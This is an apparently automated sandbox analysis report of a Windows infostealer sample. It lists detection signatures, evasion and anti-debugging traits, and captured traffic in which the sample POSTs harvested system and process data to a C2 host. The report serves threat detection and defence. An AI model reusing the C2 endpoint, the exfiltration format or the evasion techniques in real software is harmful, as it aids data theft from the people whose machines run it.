
Windows Analysis Report
xXe4fTmV2h.exe

Overview

General Information

Sample name: xXe4fTmV2h.exe
renamed because original name is a hash value
Original sample name: 764767d6adf6fa8a9c0b437d79a7a973.exe
Analysis ID: 1581223
MD5: 764767d6adf6fa8a9c0b437d79a7a973
SHA1: f06803c1321e1b613f494e337a3e7b6c11f2e880
SHA256: f938e11a28c63ca465cec4151a02add7ff1f534d31eb8ad1e4e765620da43762
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • xXe4fTmV2h.exe (PID: 2028 cmdline: "C:\Users\user\Desktop\xXe4fTmV2h.exe" MD5: 764767D6ADF6FA8A9C0B437D79A7A973)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: xXe4fTmV2h.exeAvira: detected
Source: xXe4fTmV2h.exeVirustotal: Detection: 40%
Source: xXe4fTmV2h.exeReversingLabs: Detection: 52%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: xXe4fTmV2h.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: -----BEGIN PUBLIC KEY-----5_2_00C2DCF0
Source: xXe4fTmV2h.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebp+04h], 424D53FFh5_2_00C6A5B0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [edi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [esi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [edi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [esi+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_00C6B560
Source: xXe4fTmV2h.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_00C0255D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_00C029FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500771Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 37 33 33 31 37 38 38 37 34 33 35 33 31 34 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 
22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCA8C0 recvfrom,5_2_00CCA8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500771Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 37 33 33 31 37 38 38 37 34 33 35 33 31 34 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 
20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:47:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:47:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: xXe4fTmV2h.exe, 00000005.00000003.1421794650.0000000001A54000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1427254897.0000000001A1E000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1427384359.0000000001A54000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1421486378.0000000001A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: xXe4fTmV2h.exe, 00000005.00000002.1427254897.0000000001A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0p
Source: xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: xXe4fTmV2h.exe, 00000005.00000002.1427343914.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000003.1422364338.0000000001A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lsef
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: xXe4fTmV2h.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: xXe4fTmV2h.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: xXe4fTmV2h.exe, xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708

System Summary

Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: xXe4fTmV2h.exeStatic PE information: section name: .idata
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AB6F515_3_01AB6F51
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C105B05_2_00C105B0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C16FA05_2_00C16FA0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCB1805_2_00CCB180
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C3F1005_2_00C3F100
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CD00E05_2_00CD00E0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F8E0505_2_00F8E050
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F8A0005_2_00F8A000
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C662105_2_00C66210
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCC3205_2_00CCC320
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F544105_2_00F54410
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CD04205_2_00CD0420
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0E6205_2_00C0E620
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C6A7F05_2_00C6A7F0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F847805_2_00F84780
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCC7705_2_00CCC770
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F667305_2_00F66730
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C149405_2_00C14940
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0A9605_2_00C0A960
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CBC9005_2_00CBC900
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00DD6AC05_2_00DD6AC0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00EBAAC05_2_00EBAAC0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F78BF05_2_00F78BF0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0CBB05_2_00C0CBB0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00D94B605_2_00D94B60
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00EBAB2C5_2_00EBAB2C
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F8CC905_2_00F8CC90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F7CD805_2_00F7CD80
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F84D405_2_00F84D40
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F1AE305_2_00F1AE30
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CCEF905_2_00CCEF90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CC8F905_2_00CC8F90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F52F905_2_00F52F90
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C24F705_2_00C24F70
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C110E65_2_00C110E6
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F6D4305_2_00F6D430
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F735B05_2_00F735B0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F556D05_2_00F556D0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F917A05_2_00F917A0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CB98805_2_00CB9880
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F599205_2_00F59920
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F83A705_2_00F83A70
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C41BE05_2_00C41BE0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F71BD05_2_00F71BD0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F67CC05_2_00F67CC0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00EB9C805_2_00EB9C80
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C15DB05_2_00C15DB0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C13ED05_2_00C13ED0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C25EB05_2_00C25EB0
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C450A0 appears 92 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C073F0 appears 114 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00DDCBC0 appears 103 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C0C960 appears 37 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C075A0 appears 674 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C1CD40 appears 78 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00CE44A0 appears 75 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C1CCD0 appears 55 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C071E0 appears 47 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C0CAA0 appears 63 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C45340 appears 50 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C44FD0 appears 274 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00C44F40 appears 337 times
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: String function: 00DB7220 appears 95 times
Source: xXe4fTmV2h.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: xXe4fTmV2h.exeStatic PE information: Section: mizvqalk ZLIB complexity 0.9943081642199194
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_00C0255D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_00C029FF
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
